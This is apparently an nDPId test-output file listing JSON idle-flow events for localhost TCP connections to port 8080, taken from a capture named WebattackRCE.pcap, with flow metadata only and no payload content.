00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7580000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7580000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7580000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
